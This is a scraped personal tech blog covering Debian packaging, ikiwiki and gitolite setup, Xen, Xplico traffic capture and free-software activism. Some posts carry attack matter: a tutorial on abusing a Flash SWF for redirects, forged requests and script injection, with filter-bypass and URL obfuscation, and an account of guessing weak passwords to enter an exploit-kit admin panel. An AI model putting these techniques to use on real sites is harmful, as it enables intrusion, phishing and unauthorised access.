Drunk Geisha

migrated successfull on ikiwiki !!!

2012-03-25T11:52:00.002-07:00

transferred to new blog http://www.aliceinwire.net/blog/

in this days im updating the blog on ikiwiki blog and studing ccna

2012-03-22T04:35:00.002-07:00

so im posting cisco stuff and at the same time moving the blog in my website aliceinwire.net

Network yourself!

2011-12-04T03:04:00.000-08:00

Routermon

2011-12-04T03:03:00.000-08:00

mosquito on my monitor

2011-06-26T13:14:00.000-07:00

Ikiwiki + Gitolite

2011-06-21T05:58:00.000-07:00

I had buy a RPS server from ovh.it rps offers but there isn't support for the server and the installable operating system is dated (lenny old stable). they have take ten days for activate my server so i have lost ten days for use my server (because is activated from 16-05-2011 but i had the possibility of use it since the 26-05-2011).
the RPS have a lots of problems and after the upgrade to squeeze i can't restart it for now because the iscisid version is too old and because you have to use ovh kernel for make it work and lot's of ovh parameter to set that i don't know.

so i have upgraded to squeeze in the hope that in the future i get support on it.

Ikiwiki + Gitolite

after the squeeze dist-upgrade i had start to install ikiwiki + gitolite and apache2, i want to install ikiwiki because in the debian community many people is using it, and look like a nice and fully customizable wiki.
For first i had installed apache2 and i had also installed some dependencies to enable CGI in apache2 setup as: libcgi-formbuilder-perl and libcgi-session-perl.

i want my site in the directory var/www/ikiwki/

Then i have edited my /etc/apache2/apache2.conf and add a line like this:

AddHandler cgi-script .cgi

i have find the "Options" line for the directory where i've put the ikiwiki.cgi, and add "ExecCGI" to the list of options. in my example, ikiwiki.cgi was in /var/www/ikiwiki, i edited /etc/apache2/sites-enabled/000-default and i had add it to the "Options" line in the "Directory /var/www/ikiwiki". But if you've put it in a ~/public_html, edit /etc/apache2/mods-available/userdir.conf.

i had also enabled the 404 plugin.
To make apache use it, the apache config file will need a further modification to make it use ikiwiki's CGI as the apache 404 handler. Something like this, with the path adjusted to where you've put the CGI:

ErrorDocument 404 /cgi-bin/ikiwiki.cgi

than i have installed gitolite following the root metod:

On your workstation:
(remember that the ssh key don't ask for a password when you use it)

copy your ~/.ssh/id_rsa.pub file to /tmp/YourName.pub on the server

On your server, as root:

git clone git://github.com/sitaramc/gitolite
cd gitolite
src/gl-system-install
# defaults to being the same as:
# src/gl-system-install /usr/local/bin /usr/local/share/gitolite/conf /usr/local/share/gitolite/hooks

# to upgrade gitolite, repeat the above commands. Make sure you use the
# same arguments for the last command each time.

# create your "hosting user" if not already created with the user folder
useradd -m git

su - git

# (now as git)
gl-setup /tmp/YourName.pub

and modify this file .gitolite.rc

$REPO_UMASK = 0022; #(777 - 022 = 755; -rwxr-xr-x)

On your workstation:

git clone git@server:gitolite-admin

you can also edit the .ssh/config file like this:

host gitolite
user git
hostname yourhostname
port 22
identityfile ~/.ssh/id_rsa

naturally you have to add the wiki repositories on gitolite
repo
R = @all
RW+ = admin

now you have to make the directory /var/www/ikiwiki/
readable and writeable by git user:

mkdir /var/www/ikiwiki
chgrp git /var/www/ikiwiki/
chmod 775 /var/www/ikiwiki/

ok now try to see if gitolite is working, if it is you can start installing ikiwiki:

after have done apt-get install ikiwiki and installed the suggested package that you are insterested for use with the wiki i had modified the file in /etc/ikiwiki/auto.setup like this one:

#!/usr/bin/perl
# Ikiwiki setup automator.
#
# This setup file causes ikiwiki to create a wiki, check it into revision
# control, generate a setup file for the new wiki, and set everything up.
#
# Just run: ikiwiki -setup /etc/ikiwiki/auto.setup
#
# By default, it asks a few questions, and confines itself to the user's home
# directory. You can edit it to change what it asks questions about, or to
# modify the values to use site-specific settings.

require IkiWiki::Setup::Automator;

our $wikiname=IkiWiki::Setup::Automator::ask(
gettext("What will the wiki be named?"), gettext("wiki"));
our $wikiname_short=IkiWiki::Setup::Automator::sanitize_wikiname($wikiname);
our $rcs=IkiWiki::Setup::Automator::ask(
gettext("What revision control system to use?"), "git");
our $admin=IkiWiki::Setup::Automator::ask(
gettext("Which user (wiki account or openid) will be admin?"), $ENV{USER});
use Net::Domain q{hostfqdn};
our $domain=hostfqdn() || IkiWiki::Setup::Automator::ask(
gettext("What is the domain name of the web server?"), "");

IkiWiki::Setup::Automator->import(
wikiname => $wikiname,
adminuser => [$admin],
rcs => $rcs,
srcdir => "$ENV{HOME}/$wikiname_short",
destdir => "/var/www/ikiwiki/",
repository => "$ENV{HOME}/repositories/$wikiname_short.".($rcs eq "monotone" ? "mtn" : $rcs),
dumpsetup => "$ENV{HOME}/$wikiname_short.setup",
url => "http://$domain",
cgiurl => "http://$domain/ikiwiki.cgi",
cgi_wrapper => "/var/www/ikiwiki/ikiwiki.cgi",
adminemail => "$ENV{USER}\@$domain",
add_plugins => [qw{goodstuff websetup}],
disable_plugins => [qw{}],
libdir => "$ENV{HOME}/.ikiwiki",
rss => 1,
atom => 1,
syslog => 1,
)

than i had done this

su - git

ikiwiki --setup /etc/ikiwiki/auto.setup

and that's all!!!

now you have ikiwiki + gitolite + apache

i was almost for forgotten this is my wiki finished http://r36457.ovh.net/

for any problem please comment here↓

2011-06-21T03:03:00.000-07:00

I'm the New Administrator with Gnutoo of the italian group of libreplanet, and we are tring to give update and news on the libreplanet project and free software, and is officiall approved by FSF

Libreplanet-it
Libreplanet-it wiki

you can find us also on irc #lp-it @ freenode

New women.debian.org website !

2011-05-09T10:21:00.000-07:00

We are working on making a new interface for the women.debian.org website using ikiwiki and switching the repository from the old SVN to GIT!
yeah git rulez !!!

here is the preview of the site women.debian.org

I adopted Nautilus-Actions

2011-05-09T08:41:00.000-07:00

* New upstream maintenance release.
- debian/control.in:
- New Maintainer (closes: #620570)
- Added Homepage, thanks to jeansch.
- Bump Standards-Version to 3.9.1; no changes required.
debian/*.1
- Added nautilus-actions-print manpage; thanks to jeansch.
- Various fix.
debian/copyright
- Fixed GPL-2 path according to lintial warning the license used;
thanks to jeansch.
debian/nautilus-actions.dirs
- Removed, not used anymore; thanks to jeansch.

http://svn.debian.org/wsvn/pkg-gnome/?op=comp&

Last upstream here: http://www.nautilus-actions.org/downloads/

This is my build string for svn-builpackage with cowdancer and pbuilder (based on zack command) using file from a remote repository without committing the local changes but you need to add the new files!!
and it only build the package and test it with litian and don't add a new Debian changelog entry when done

using: svn add

alias svn-btc="svn-buildpackage --svn-builder='pdebuild --pbuilder cowbuilder --buildresult ..' --svn-lintian --svn-noautodch --svn-dont-clean --svn-ignore"

write svn-btc for launch the command

Tuesday May 4th, is the Day Against DRM!!!

2011-05-04T10:02:00.000-07:00

Today is the day against DRM (Digital Rights Management).

© xkcd
This picture is licensed under a Creative Commons Attribution-NonCommercial 2.5 License.

Richard Stallman, President of the Free Software Foundation:
”The motive for DRM schemes is to increase profits for those who impose them, but their profit is a side issue when millions of people’s freedom is at stake; desire for profit, though not wrong in itself, cannot justify denying the public control over its technology. Defending freedom means thwarting DRM.”

I had buy my kindle DX and i think to have the right to use it in any possible way. formatting it or installing a different kernel but DRM give me no freedom on most stuff that i buy and sometime is also absurd like in Italy for mass media device we have to pay a tax on it because in the future-use we can maybe install some copyrighted software or buy a computer and have to pay lot of money for a System Operator like Microsoft or Apple software that i never used, that's weird DRM is taking to power in every aspect of our lives, making you pay what is free for definition...
and not happy of this is also making the way that you have to contribute on your cause also if you are against it.
like lot of industries making not bad product but limited by DRM and with little other chose in different ways if you don't want the DRM and much more expensive...

Gnome 3 and Gnome Shell

2010-04-16T03:55:00.000-07:00

Gnome 3 will be released in September 2010 integrating a stable version of Gnome Shell (currently in active development)!!!

The first noticeable change in GNOME Shell is that the two panels of GNOME 2 are replaced by a single black panel at the top of the screen

The most important of the innovations seen in GNOME Shell is the Activities overview mode which dedicates a full screen to all the different ways in which the user can switch from doing one thing (an activity) to doing something else.

Gnome Shell is a really cool innovation on Gnome. It provides core interface functions like switching to windows and launching applications. GNOME Shell takes advantage of the capabilities of modern graphics hardware and introduces innovative user interface concepts to provide a delightful and easy to use experience.

Is really different from the previous Gnome Interface and it take a bit of time for have full controll of this new interface but you can also see lot of improvements !

Gnome Shell screenshots

irc.gnome.org:#gnome-shell

Twitter #gnomeshell

Wanted Wardriver

2010-03-21T03:36:00.000-07:00

Cerco Wardriver per il Cat a orvieto di luglio 2010 per formare un team
mandate le richieste a jingcomics (et) gmail.com

http://www.wardriving.it/

Buon anno :D

2009-12-31T02:37:00.000-08:00

Sono stata un pò assente in questo periodo perchè mi sto impegnando in progetti che mi prendono molto tempo e che trovo fantastici...

In questo periodo ho letto la trilogia millenium di Stieg Larsson, la storia è molto avvincente e i personaggi adorabili.
Un peccato che molte domande rimangano irrisolte per la morte dell'autore :( ;
ad esempio che combina la sorella di Lisbeth...

Sto anche iniziando un altro libro La matematica del novecento di Odifreddi.

Auguro a tutti un Buon Anno nuovo e vi lascio con una immagine fatta da Achamo

exploitbin project open

2009-11-13T10:30:00.000-08:00

exploitbin code project

exploitbin is a pastebin with exploiting functionality and a collaboration open source platform for find exploit on internet

is pretty new and need lot of help !!!

ikee virus for iphone

2009-11-13T09:28:00.000-08:00

You have jailbroken your iphone for make it more configurable and you use ssh for uploading stuff and you have not changed your password ???

Most internet site write the default password of the iphone ssh jailbroken ( alpine) this information can used from a malware or a bad user for take information and make in risk your iphone.

In this day there is also a iphone virus

http://is.gd/4Unwx

The virus is really simple it check ip and if find a iphone in the network it try to use default ssh password

For secure your iphone is pretty simple

For this guide, you are going to need MobileTerminal (download it from Cydia):

Open the MobileTerminal Application on your device:
Type in ’su root’ and click enter:
It will ask for the password so type in ‘alpine’ which is the default password:
Type in ‘passwd’ and click enter:
It will ask for a new password (more than 5 characters) so type it in:
It wil ask your to retype the password:

This is the interview with the creator:

[09:02] Hi ikee :-) Thanks for joining me
[09:02] nps
[09:03] Now, as you're well aware, you wrote a virus that is infecting many iPhones in Australia. I guess the real question to start with is why?
[09:04] First i was curious to how far something like this would actually spread, i think what most people were unaware of is the fact it IS a worm and every phone that got infected with it was spreading it (I initially only infected 3 phones when I woke up i checked google and found out a fair few people were hit with it)
[09:05] Secondly i was quite amazed by the number of people who didn't RTFM and change their default passwords.
[09:07] How far did you expect it to spread, exactly?
[09:08] Well i didn't think that many people would have not changed their passwords I was expecting to see maybe 10~ or so people, at first I was not even going to add the replicate/worm code but it was a learning experience and i got a tad carried away :)
[09:11] Are you aware that it has even started to replicate itself overseas?
[09:13] I heard a few stories about it, that would have been sheer luck, the code itself is set to firstly scan the 3G IP range the phone is on, then Optus/Vodafone/Telstra's IP Ranges (I think the reason Optus got hit so hard is because the other 2 are NAT'd) then a random 20 IP ranges. I'm guessing a few phones hit a range that another vulnerable phone was on.
[09:14] (From another country)
[09:15] Well that was my next question: Why does it only seem to be hitting Optus here and Overseas (I was presuming from screenshots I've seen)... So you're saying the Optus network is more vulnerable due to it not using NAT?
[09:17] I don't think it was an Optus fault (Being an Optus user I quite like the fact i can access my iPhone services from the outside world), I think it was mainly the fault of people being to lazy to change their passwords (It only takes a couple of seconds guys) and I hope this taught a few people that.
[09:18] So do you know exactly how many people are currently infected with the "ikee virus"?
[09:20] I can only confirm how many my phone infected alone, which was 100+ phones. I think most of them fixed it (AND I'M HOPING THEY CHANGED THEIR PASSWORDS.)
[09:21] So your major defense seems to be that people left themselves vulnerable, Do you steal stuff from people's houses if they leave the backdoor open?
[09:24] I'll answer your question with two questions, Have you ever used unprotected Wifi? and Technically I did not steal anything, have you ever littered on someone else's property? (Smokers will definitely associate ;))
[09:25] Ok, I suppose I can personally admit to both of them, but it seems alot more to me like vandalism than littering, which isn't something I would do
[09:27] Personally I would class littering as vandalism (They definitely don't want your rubbish there). I admit I probably pissed of a few people, but it was all in good fun (well ok for me anyway)
[09:30] So that explains why you decided to use Rick Astley. In my research, I've been reading about a similar virus (it seems) that contains a picture of an 'asian child' - I havn't seen screenshots of this, but that's how it is described. Are you also responsible for the "Asian Child virus"?
[09:32] Ahh that was a quirk of my bad coding, the 'virus' itself has 4 variations and the first variation would resend its LockBackground.jpg to the victim. I did not comprehend that the infector might have not rebooted their phone after changing the LockBackground to something else (Causing them to send their changed lockbackground instead of Mr Astley)
[09:36] So it's the same virus, but now containing a picture of someone's loved one?
[09:37] Yeah, that was definitely not the intended effect.
[09:39] Are you aware of the possible legal consequences of this (the ikee virus)? Are you concerned?
[09:40] I'd like to think I'm aware, and also I highly doubt I'm in any real trouble (So no not concerned)
[09:43] James01 on Whirlpool asks: at least one person has reported being affected without a jailbreak â€“ seems unlikely given the nature of the phone and what I have garned about the "virus" - is this possible, or are the reports unreliable/mistaken?
[09:44] It only affects jailbroken phones, so people probably just got a little confused
[09:45] vanquish777 on Whirlpool says: What I want to know is, how did I get infected when I had SSH toggled off
[09:46] You didn't :), My guess is you had it on and when the 'virus' hit, it disabled sshd so when you checked it afterwards it appeared to be off
[09:47] Which reminds me, many people have said they are no longer able to disable SSH, is this intended to make sure you can do more damage to users?
[09:50] This was a hard bit for me to do, until i hit this the virus was not destructive at all. My first intention was to change the root/mobile password to random strings, then embed the strings into the LockBackground. Unfortunately passwd uses a tty (and not stdin) for its new password:request (similar to ssh logins, which is why you might find sshpass in /bin/, i had to port it) so to stop the phone getting infected over and over again (and
[09:50] someone else catching on and having mischief with peoples phones) I removed SSHD (cydia reinstall will rememdy the problem)
[09:51] (Cydia reinstall of SSH not reinstall Cydia itself)
[09:53] So you're saying that the only harm this virus causes is the removal of the SSH Daemon, which effectively, disables the initial problem?
[09:53] Well that and the pretty background yes :)
[09:54] You mentioned that there are four versions/variants, what are the differences between them?
[09:55] Variants A-C were quite similar and the ones most people have bought up. Variant D is fair bit different, it stores its files in a completely different place and hides itself a lot more (No random plists in LaunchDaemons)
[09:56] So you're saying that the newest variant is more hidden, is it more malicious?
[09:57] It is a lot more hidden, a think most phones tend to be more secured now so it should die pretty fast. It is a little more malicious it tampers with some Cydia files.
[10:01] Do Android users risk being infected? I'm guessing that the virus would only log in as root:alpine (the default root username and password for the iPhone OS IIRC)
[10:02] AFAIK no unless a user decided to use the same passwords, Although there is a weird quirk I read about dropbear in Android allowing any password (A bug with libcrypt I believe) but I could be very wrong.
[10:03] But even if an android phone was attacked the platform differences would not allow the code to be run :)
[10:04] Just out of curiousity, what do you call what i've named the "ikee virus"?
[10:05] Its in a folder called POC-iWorm (Proof Of Concept) but I never named it (ikee virus works!)
[10:09] You yesterday agreed to send me the source code (and removal instructions), what variant will it contain?
[10:10] C/D whatever version you want :)
[10:11] How about all four? I'll obviously be placing them online - probably Google Code or similar
[10:13] A-C was updated so I don't have the first 2, I forked D from C. (I don't know if its so wise posting the code online, nefarious people that otherwise would not have had the chance could modify it to be quite destructive)
[10:14] Perhaps, But it has become quite clear that there's a load of people that are unsecure, and if anyone wants to do anything bad enough, they are already going to know how.
[10:15] I guess i'm hoping that the jailbreak software will soon have a "enter new root password" prompt for those users that are un-aware.
[10:15] I'll leave the choice up to you :)
[10:15] I'd love to see that
[10:16] or even a random password generated and displayed for the user to write down
[10:17] Yes, it would be very good. I had an iPod Touch a while ago, which I "jailbroke" - admittedly I didn't change the default password. I guess i'm just glad it's not me.
[10:17] Do you plan on making any further variants? If so, why?
[10:18] No, I think the point has been made
[10:18] Have you developed anything PRODUCTIVE in the iPhone world?
[10:21] I'm not too sure what others would class productive. I do not own a MAC or run OSX (Using a linux cross compile toolchain) so it makes it abit of a challenge to develop any applications utilising the UI (I have tho -.-). I think the best program ive developed for it for me was a remote debugging library that sends debug information over the network (Using MCAST)
[10:23] Do you have anything further to add (I'm having a mental blank on questions to ask right now)
[10:26] I hope I did not piss off many people, this was a very simple problem and has an even simplier solution. I thought it was quite funny and I hope others did too :)
[10:27] You mentioned infecting only three iPhones to being with, when did that happen?
[10:28] Around 4am November 6th (Yeah I have no life)
[10:31] To confirm, other than replicating itself, adding the picture of Rick Astley, and removing the SSH Daemon, are we likely to find anything else it does?
[10:32] Nothing, and if you're releasing the source code people will be able to see that :)
[10:33] Can you please explain to me, how an infected user would remove the different versions correctly?
[10:33] by correctly, I mean completely.
[10:33] Sure, variants A-C store files in these directories
[10:34] /bin/poc-bbot
[10:34] /bin/sshpass
[10:34] /var/log/youcanbeclosertogod.jpg
[10:34] /var/mobile/LockBackground.jpg
[10:35] /System/Library/LaunchDaemons/com.ikey.bbot.plist
[10:35] /var/lock/bbot.lock
[10:35] using an rm (in SSH or mobile-terminal on those files will remove it)
[10:36] then reboot the phone, change your password and reinstall SSH
[10:36] For variant D its abit different
[10:36] The locations are
[10:37] /usr/libexec/cydia/startup
[10:37] /usr/libexec/cydia/startup.so
[10:37] /usr/libexec/cydia/startup-helper
[10:37] /System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist
[10:38] Of course cydia used these files previously so you may need to reinstall it after deleting this files
[10:38] *these
[10:38] So the D variant overwrites system files?
[10:39] Overwrits cydia's files
[10:39] *Overwrites
[10:39] Sorry, I'm not an expert at the iPhone OS :P
[10:39] Neither :P
[10:40] So none of your versions do contain any password changing commands?
[10:40] I mean, so when I provide uninstall instructions, I can tell them to use alpine as the password ?
[10:41] None of the code changes passwords
[10:42] Thanks for your time ikee, and I really hope you do get into developing things that are productive sometime soon.
[10:42] me too :) and no problems
[10:42] Perhaps on the Android platform (Yes, I know, I'm a fanboy)
[10:42] I just downloaded the x86 iso, so maybe :P
[10:43] I'll ask you more about that after I end this logging session, Cheers :)
[10:43] Ciaoo
End of #Interview_Room buffer Sun Nov 08 10:43:58 2009

Dropbox open source !!!

2009-11-13T03:36:00.000-08:00

Is open Votebox a application for choose what new feature have the priority on other in the Dropbox application!

I'm a debian user and im really sad that dropbox is not in the debian repository because the dropbox images are copyrighted ...
so i have open a group for make dropbox completly open source and GPL for make it added in the debian repository

Please vote here

*you have to loginin for vote!

Honeypot and Honeynet

2009-11-13T00:32:00.001-08:00

In this day i have try some new cool technology that i love...

Honeypot

What they are? a honeypot is a fictional vulnerable system used to attract malicius software in the intent of use the fake bugs on the server and at the same time to grab information about the attacker and the technics used for attacks. A honeynet is a network of two or more honeypot.

All the data retrived by a honeypot can be used for many reason, try to make a profile of the attacker, for research tring to steal the exploit and 0day stuff used by the attacker and know new vulnerability and can also be used in a legal procedure.

The honeypot are divided in three level depending on how deep an attacker can interact with it

Low interation are emulated by software and the interaction is really inconsistent

medium interaction they are chrooted or jailed and provide a limited system access

high interation the attacker can have full access on the server

they are also classified on the data that they can collect

Production can collect only limited information

Research can collect more information about the attacker and the strumentation used for the attack, they are used for reasearch by goverment and military.

Another version of honeypot are used for capture spammers giving fake smtp convicing the abuser that is a usable smtp relay for sending all sort of email when in fact is not and also can try to intercept the ip of the illegit user.

Some honeypot can also try to assorb and reverse the malware when it try to attack the fake server for research analysing the binary file.

Some honeypot software can be:

Labrea is a tarpitting honeypot used for deceive the attacker scanner showing faking server with all port open in the unused network ip web adress for tarpitting but this can be useless with multithreading scanners.

Nepenthes is a good botnet detector and tracker and can also try to reverse the binary file and shellcode

Dionaea the successor of nepenthes developed by the same team http://dionaea.carnivore.it/ and is a part of the google summer code.

Honeyd is a small daemon need for create virtual hosts on a network. this virtual host created can be configured for attract intruder of specific vulnerability.

For make a honeypot work you have to be really patient !!! and wait...

a intruder can take lot of time before try to compromise it.

The best is to have a firewall and other security tools for have the most possible data and information about the intrusion.

Liberty Exploit pack... exploited!

2009-11-13T00:31:00.000-08:00

Liberty Exploit System
latest: 1.0.5

exploits:
MS06-014 Internet Explorer (MDAC) Remote Code Execution Exploit
PDF util.printf(), PDF collab.collectEmailInfo(), PDF collab.getIcon()
Flash 9
MS DirectShow
Snapshot
Java 0day

price: 500$

Yesterday i was looking for this packet of exploits called Liberty pack.

So it was really interesting and more interesting when i have found that the default username and password is user and pass ...

so i have search in malwareurl for a cpanel admin.php of liberty pack...

the first panel found i had try user and pass for login but don't work so i think that also the utilizator of liberty pack know now that leave the default password is insecure.

So i have try the most common passwords = 1234,god,password and... it work!!!

Now i have the access to the liberty pack cpanel

it looks nice but not so nice for a 500$ exploit pack, is the essential for make it work...

Ok is not really big, i have see some other of 15k uniques visits but is not bad

It inject for the most in ie7 and old ie version

The principal infected country is Turkey

The most infected OS is windows xp but there is also a strange Unknow system that i suspect to be some "crew" windows version like tinyxp or blackxp

This is one of the most interesting part the referreals

looks like a turkish forum infected http://www.msxlabs.org/

naturally about windows stuff :D

and also the other referreals are all forums

(i suppose that the attacker inject in the post a invisible frame about the exploited page for infect other user of the forum)

Ok this is the exploit used for infect the users

how i have find it... simple looking in the page source i have see a id=6 about exploits commented

i have try to insert it in the admin page and i have see the redirection to the exploit page :D

what that exploit number means ? ms06-014 is a vulnerability in the microsoft data access components!!!

id=4 reset the counter

i have try to inject some code in the upload form but don't work for now...

this are the files used by liberty pack

site.com/index.php
site.com/download.pdf
site.com/Hidden.swf
site.com/update.php
site.com/update.exe
site.com/admin.php

thanks everyone for listening

Jump/XSS/CSRF in Flash

2009-11-13T00:30:00.002-08:00

Hello everyone sorry for my absencebut i had lot stuff to do.

today i talk about Jump/XSS/CSRF in Flash.

The point of this tutorial is about build a redirect with flash jump

For the start we need to use a precompiled swf

fly.tar.gz

we have to upload the swf file to a webserver i had used altervista.org for it

than we have to make a file txt with the same name of the swf like test.swf and test.txt

now we have to edit the txt file

this are example of the edit of file .txt

jump to http://drunkgeisha.noblogs.org
0,http://drunkgeisha.noblogs.org

open window to http://drunkgeisha.noblogs.org
1,http://drunkgeisha.noblogs.org

send GET Request to drunkgeisha.altervista.org
2,http://drunkgeisha.altervista.org/?hello

send POST Request to drunkgeisha.altervista.org
3,http://drunkgeisha.altervista.org/?hello,,,str=string

Call JavaScript
4,alert(/xss/)

now you have to try it

for do it you need only to write in the browser

test.swf?sec80=http://yoursite/test.txt

this string may be better for bypass some filter

test.swf?sec80=http://yoursite/test.txt&80sec.swf

if everythings is correct you can see this

now you have to embed it on some page

i have used tinyurl for obscure better the url http://tinyurl.com/yhh5x7l = http://drunkgeisha.altervista.org/prova.swf?sec80=http://drunkgeisha.altervista.org/prova.txt

the result is this

http://drunkgeisha.altervista.org/index.html

and this on blogspot

sorry for the bad quality but is my first tutorial video

programmer life

2009-11-13T00:30:00.001-08:00

A good example of a programmer life

Aperto il circolab :)

2009-11-13T00:29:00.002-08:00

In questi giorni sono stata assente perchè ho aiutato nell'riapertura del circolab :)

http://www.circolab.net

Cos'è il Circolab ?

nemmeno noi sappiamo realmente cosa sia il Circolab !!!

Da una recente discussione è risultato essere

Un laboratorio/circolo informatico con il miglior bar di Brescia :D

Cosa dice di noi il Brescia Oggi

Domenica 25 Ottobre 2009 Ha riaperto il Circolab dove Internet è gratis.
Riapre questa sera con un aperitivo e un dj set dalle ore 19 il CircoLab, laboratorio di informatica libera nel quartiere Carmine. Nei locali di via Battaglie 29 è possibile trovare un Internet point gratuito, dove tutti i computer utilizzano Linux e gli attivisti organizzano corsi di informatica a livello base e avanzato (che partiranno prossimamente).
All'interno del circolo c'è un bar, sono organizzate proiezioni e si può ascoltare musica. Tra i progetti attivi c'è gnumerica.org, un server che offre caselle postali senza pubblicità, spazio web, mailing list.
GLI ATTIVISTI cercano di diffondere l'utilizzo consapevole delle tecnologie, in particolare di mettere in guardia chi utilizza i computer dalle insidie dei programmi e dei servizi commerciali.
«Aprire una casella di posta o una mailing list su gnumerica significa ad esempio non fornire i propri dati a società che potrebbero usarli con un secondo fine - afferma Marco «marcogh» Ghidinelli -; siamo tutti volontari e lo facciamo per passione».
Il Circolab è aperto dal giovedì al lunedì, dalle 17 alle 23:30, l'ingresso è riservato ai tesserati. FR

Inaugurazione apertura dell gruppo Girl Geek Dinners Brescia

2009-11-13T00:29:00.001-08:00

GGD anche a brescia.

Il 25 ottobre l'inaugurazione del gruppo GGD Brescia !!!

Con gara di polpette !!!

Dj set:

Bio

Algaritmo

Aliceinwire

Corsi di Linux

Abbiamo anche facebook

The first Sourcefire italian community for support and discuss :)

2009-11-13T00:28:00.001-08:00

I'm happy to annunce the first Sourcefire italian community for support and discuss about security and similar stuff.

Sourcefire is a fantastic product from the creator of Snort, it have a amazing web control panel with lot of widget and good ampliable capacity, it report all IDS /IPS event (also the most difficult to find) in the simply user interface web graphic dashboard.

Login Screen

Product “Home” Before Kristi

Product “Home” After

“Events” Before Kristi

“Events” After

Online Help (Customized for Each Product)

PDF Manual Cover (Easily Customized for Each Product)

Product Design Guide (PDG) for Developers

OEM Rebrand for Nortel – Login

OEM Rebrand for Nortel – Home

Xen hypervisor daemon error

2009-11-13T00:25:00.000-08:00

I have installed Xen but i found this problem when i run virt-manager and i try to connect to Xen localhost:

Unable to open a connection to the Xen hypervisor/daemon.

Verify that:
- A Xen host kernel was booted
- The Xen service has been started

Unable to open connection to hypervisor URI 'xen:///':
unable to connect to '/var/run/libvirt/libvirt-sock': Permission denied
Traceback (most recent call last):
File "/usr/share/virt-manager/virtManager/connection.py", line 486, in _open_thread
None], flags)
File "/usr/lib/python2.5/site-packages/libvirt.py", line 99, in openAuth
if ret is None:raise libvirtError('virConnectOpenAuth() failed')
libvirtError: unable to connect to '/var/run/libvirt/libvirt-sock': Permission denied

This is the solution that i have found:

cd /etc/xen/

and edit:

xend-config.sxp

activating this configuration:

(xend-http-server yes)
(xend-unix-server yes)

than reboot the computer and all goes right

now im tring to add new vm ...

How to capture real time traffic network with tcpdump and Xplico

2009-10-06T07:08:00.000-07:00

Sorry for the few post in this day but im working in to much project at the same time :S

I have try this xplico today and it work pretty good,it still need some fix , but it do the work.

Ok for start you need to install Tcpdump and Xplico from your distribution installation command.
for dependance:

apt-get install sqlite tcpdump tshark apache2 php5 php5-sqlite build-essential perl zlib1g-dev libpcap-dev libsqlite0-dev libmysqlclient15-dev php5-cli python-all
(in the wiki version the l is missed in php5sqlite)

if you have download the .deb you have only to give
dpkg -i name.deb

if you have download the source code you have to give with root permission
make install

for install the interface you need apache with rewrite, php5 and php5-sqlite
and put the file in your web server
usually /var/www/

post_max_size = 100M
upload_max_filesize = 100M

ok now for the live capture we have to give this command (and every time you need a new live caption)

cd /opt/xplico/script/db/sqlite2
./create_xplico_db.sh

At this time you only need to go at http://localhost:9876

Insert the user and password write in the bottom and insert the capture id
when you have insert all id
you can run this:

cd /opt/xplico/script
./rt_demo.sh

(in the source that i have download this script is copyrighted i hope the author can modify it with GPL2 because it need some modify for the tcpdump command in it)
update:
I had received a mail from the author about this script when he said that in the neXt Release is all GPL !
Thanks for the fast replay :)

At this time is starting to retrive network packets and to catalogate it
You can also start to see the web packet retrived and other stuff

You can read also Email

Protocols Dissectors

Dissector	Status	Note
Ethernet	100%	—
PPP	90%	—
VLAN	95%	—
L2TP	70%	—
IPv4	98%	—
IPv6	98%	—
TCP	95%	—
UDP	100%	—
DNS	80%	—
HTTP	100%	—
SMTP	95%	—
POP	95%	—
IMAP	95%	—
SIP	80%	—
RTP	70%	—
RTCP	60%	—

Dissector	Status	Note
SDP	70%	—
FTP	90%	—
IPP	90%	—
PJL	90%	—
NNTP	30%	—
MSN	10%	—
IRC	15%	—
YAHOO	0%	—
GTALK	0%	—
EMULE	0%	—
SSL/TLS	0%	with keys
IPsec	0%	with keys
802.11	0%	with keys
MMSE	95%	over HTTP
Linux cooked	95%	SLL
TFTP	90%	—

I want say thanks to Xplico Team for this great software :)